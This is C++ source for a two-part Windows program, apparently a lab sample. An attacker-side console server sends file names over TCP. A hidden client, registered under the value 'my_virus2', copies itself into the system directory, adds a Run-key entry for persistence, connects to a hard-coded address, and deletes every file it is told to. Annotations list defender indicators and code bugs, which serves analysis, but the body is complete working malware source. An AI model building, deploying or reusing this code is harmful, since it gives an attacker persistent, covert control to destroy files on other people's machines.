Сервер (установлен на компьютере злоумышленника):
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <atlstr.h>
#pragma comment(lib, "Ws2_32.lib")
// Operator-side console program of this two-part sample.
// It listens on TCP port 27015 on every local interface (INADDR_ANY), accepts
// a single connection, then reads file names from stdin and sends each one,
// including its terminating NUL, to the connected peer. An empty input line
// ends the session.
// The channel is plain TCP: nothing in this function authenticates the peer or
// encrypts the file names, so the strings cross the network exactly as typed.
// Returns 0 after a session ends, 1 if WSAStartup, socket(), bind() or
// accept() fails.
int _tmain(int argc, _TCHAR* argv[])
{
// Initialize Winsock (version 2.2 requested)
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult!= NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 1;
}
// Create a SOCKET for listening for
// incoming connection requests.
SOCKET ListenSocket;
ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ListenSocket == INVALID_SOCKET)
{
printf("Error at socket(): %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
// The sockaddr_in structure specifies the address family,
// IP address, and port for the socket that is being bound.
// INADDR_ANY means the listener is reachable on all interfaces of this host.
sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(27015);
if (bind(ListenSocket,
(SOCKADDR*) &service,
sizeof(service)) == SOCKET_ERROR)
{
printf("bind() failed.\n");
closesocket(ListenSocket);
// NOTE(review): unlike the other error paths, this one returns without WSACleanup().
return 1;
}
// Listen for incoming connection requests
// on the created socket
// NOTE(review): a listen() failure is only logged; execution continues to accept().
if (listen(ListenSocket, SOMAXCONN) == SOCKET_ERROR)
printf("Error listening on socket.\n");
// Create a SOCKET for accepting incoming requests.
SOCKET AcceptSocket;
printf("Waiting for client to connect...\n");
// Accept the connection. Peer address is not requested (NULL, NULL), so the
// program never learns or checks who connected.
AcceptSocket = accept(ListenSocket, NULL, NULL);
if (AcceptSocket == INVALID_SOCKET)
{
printf("accept failed: %d\n", WSAGetLastError());
closesocket(ListenSocket);
WSACleanup();
return 1;
}
printf("Client connected.\n");
// data transmission: one file name per input line, until an empty line
CStringA strFilePath;
while(true)
{
printf("Input file name: ");
// NOTE(review): gets() has no length limit, while the buffer requested here
// holds MAX_PATH characters; a longer input line writes past the buffer.
gets(strFilePath.GetBuffer(MAX_PATH));
strFilePath.ReleaseBuffer();
// Empty line -> leave the loop and close the connection
if (!strFilePath.GetLength())
break;
// Length + 1 so that the terminating NUL travels with the name; the receiver
// relies on it to find the end of the string.
int nSent = send(
AcceptSocket,
strFilePath.GetString(),
strFilePath.GetLength() + 1,
0);
if (nSent == SOCKET_ERROR)
{
printf("\nClient disconnected.\n");
break;
}
}
closesocket(AcceptSocket);
closesocket(ListenSocket);
WSACleanup();
return 0;
}
Клиент (установлен на виртуальной машине – не имеет окна):
#include "stdafx.h"
#include <atlstr.h>
#pragma comment(lib, "Ws2_32.lib")
//////////////////////////////////////////////////////////////////////////
// Treats the received string as a file path and deletes that file.
void HandleData(const CStringA &strData);
// Copies the running executable into the Windows system directory and reports
// the destination path through strNewFilePath.
void CopySelfToSystemDir(CString &strNewFilePath);
// Registers strNewFilePath under the machine-wide Run key so it starts at logon.
void SetAutorun(const CString &strNewFilePath);
//////////////////////////////////////////////////////////////////////////
// Client half of the sample. In order, it:
//   1. copies its own executable into the system directory (CopySelfToSystemDir),
//   2. writes a Run-key value pointing at that copy (SetAutorun),
//   3. connects to the hard-coded address 192.168.79.1, TCP port 27015,
//   4. passes every string it receives to HandleData, which deletes the named file.
// Artifacts visible in this function that a defender can key on: outbound TCP
// to 192.168.79.1:27015 from a process with no window, preceded by the file
// copy and registry write done by the two helpers.
// Nothing received is authenticated or validated before it is acted upon.
// Returns 0 when the receive loop ends, 1 if WSAStartup or socket() fails.
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
// application without window
// NOTE(review): no window is created anywhere in this function; presumably no
// console is attached either, so the printf() output below is not shown
// anywhere — confirm against the project settings.
CString strNewFilePath;
// Persistence steps run first, before any network activity.
CopySelfToSystemDir(strNewFilePath);
SetAutorun(strNewFilePath);
// Initialize Winsock (version 2.2 requested)
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult!= NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 1;
}
// Create a SOCKET for connecting to server
SOCKET ConnectSocket;
ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ConnectSocket == INVALID_SOCKET)
{
printf("Error at socket(): %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
// Server address is compiled into the binary as a plain string literal.
CStringA strServerAddress("192.168.79.1");
// IP address, and port of the server to be connected to.
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr(strServerAddress.GetString());
clientService.sin_port = htons(27015);
// Connect to server.
// Empty-bodied loop: connect() is retried back-to-back, with no delay, until it
// succeeds. While the server is absent this likely shows up as a steady stream
// of failed connection attempts to the same address and port.
while(connect(ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService)) == SOCKET_ERROR);
printf("Connected to server.\n");
// connection established
// data transmission
// select() timeout: 10000 microseconds (10 ms)
struct timeval tSelTimeout;
tSelTimeout.tv_sec = 0;
tSelTimeout.tv_usec = 10000;
fd_set setSocketRead, setSocketWrite;
FD_ZERO(&setSocketRead);
FD_SET (ConnectSocket, &setSocketRead);
FD_ZERO(&setSocketWrite);
FD_SET (ConnectSocket, &setSocketWrite);
// Loop until select() itself reports an error (-1) or the peer goes away.
while((select (FD_SETSIZE, &setSocketRead, &setSocketWrite, NULL, &tSelTimeout))!= -1)
{
if(FD_ISSET(ConnectSocket, &setSocketRead))
{
// ConnectSocket is ready to recv
// Up to MAX_PATH bytes are read straight into the CString buffer.
// ReleaseBuffer() is called without a length, so the string ends at the first
// NUL found in the buffer; the sender transmits that NUL with each name.
CStringA strData;
int nRecv = recv(ConnectSocket,strData.GetBuffer(MAX_PATH),MAX_PATH,0);
strData.ReleaseBuffer();
// 0 = connection closed by the peer, SOCKET_ERROR = receive failed
if ((nRecv == 0) || (nRecv == SOCKET_ERROR))
{
printf("\nClient disconnected\n");
break;
}
// The received bytes are handed over unchecked; HandleData deletes the file
// they name.
HandleData(strData);
}
if(FD_ISSET(ConnectSocket, &setSocketWrite))
{
// ConnectSocket is ready to send (nothing is ever sent back to the server)
}
// Re-arm the timeout and both descriptor sets for the next select() call.
tSelTimeout.tv_sec = 0;
tSelTimeout.tv_usec = 10000;
FD_ZERO(&setSocketRead);
FD_SET (ConnectSocket, &setSocketRead);
FD_ZERO(&setSocketWrite);
FD_SET (ConnectSocket, &setSocketWrite);
Sleep(1);
}
closesocket(ConnectSocket);
WSACleanup();
return 0;
}
// Deletes the file whose path is given in strData and prints the outcome.
// strData is the raw string received from the network; it is passed to remove()
// with no validation, so any file the process is allowed to delete can be named.
// On a monitored host the effect is a file-delete event issued by this process
// for a path that arrived over the TCP connection.
void HandleData(const CStringA &strData)
{
if(remove(strData.GetString()) == 0)
printf("File '%s' was removed.\n", strData.GetString());
else
// Any non-zero result from remove() lands here, not only "file does not exist".
printf("File '%s' was not found.\n", strData.GetString());
}
// Copies the running executable into the Windows system directory, keeping its
// file name, and stores the destination path in strNewFilePath.
//
// strNewFilePath (out): "<system directory>\<exe file name>". It is filled in
// before the copy is attempted, so it is set even when CopyFile fails; it is
// left untouched when GetSystemDirectory fails.
//
// Observable effect: a process writing a copy of its own image into the system
// directory. Failures are ignored silently — the function just returns.
void CopySelfToSystemDir(CString &strNewFilePath)
{
// Get the path of the running exe file
CString strFilepath;
DWORD dwSize = MAX_PATH;
DWORD dwError;
// NOTE(review): GetModuleFileName's return value is documented as a character
// count; here it is compared with error-code constants, so this loop and the
// check after it probably do not do what the names suggest — confirm.
while ((dwError = GetModuleFileName(NULL,
strFilepath.GetBuffer(dwSize + 1),
dwSize)) == ERROR_INSUFFICIENT_BUFFER)
{
dwSize += 10;
strFilepath.ReleaseBuffer();
}
// Empty body: the result of the call above is not acted upon.
if (dwError!= ERROR_SUCCESS){}
// Get the path of the system directory
CString strSysDir;
UINT nSize = GetSystemDirectory(strSysDir.GetBuffer(MAX_PATH), MAX_PATH);
if (nSize == 0)
{
return;
}
// File name = everything after the last backslash of the exe path
const TCHAR *szFileName = _tcsrchr (strFilepath.GetString(), _T('\\'));
strNewFilePath.Format(
_T("%s\\%s"),
strSysDir.GetString(),
(szFileName + 1));
// Already running from the destination path: nothing to copy
if (strFilepath.CollateNoCase(strNewFilePath) == 0)
return;
// Third argument FALSE: an existing file at the destination is overwritten
BOOL bResult = CopyFile(strFilepath.GetString(), strNewFilePath.GetString(), FALSE);
if (!bResult)
{
return;
}
}
// Registers strNewFilePath for automatic start by writing it as the string
// value "my_virus2" under
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
//
// Both the key path and the value name are fixed literals, which makes this
// registry write a stable host indicator for the sample. If the program is
// built as 32-bit and run on 64-bit Windows, registry redirection would
// presumably place the value under the WOW6432Node view of the same key —
// check both views when hunting.
// Failures (for example insufficient rights to write under HKLM) are ignored
// silently. The caller passes the path unconditionally, so the value is written
// even if the preceding file copy failed.
void SetAutorun(const CString &strNewFilePath)
{
ATL::CRegKey key;
// Create() opens the key if it already exists
LONG status = key.Create(HKEY_LOCAL_MACHINE, _T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"));
if (status!= ERROR_SUCCESS)
{
return;
}
status = key.SetStringValue(_T("my_virus2"), strNewFilePath.GetString());
if (status!= ERROR_SUCCESS)
{
return;
}
key.Close();
}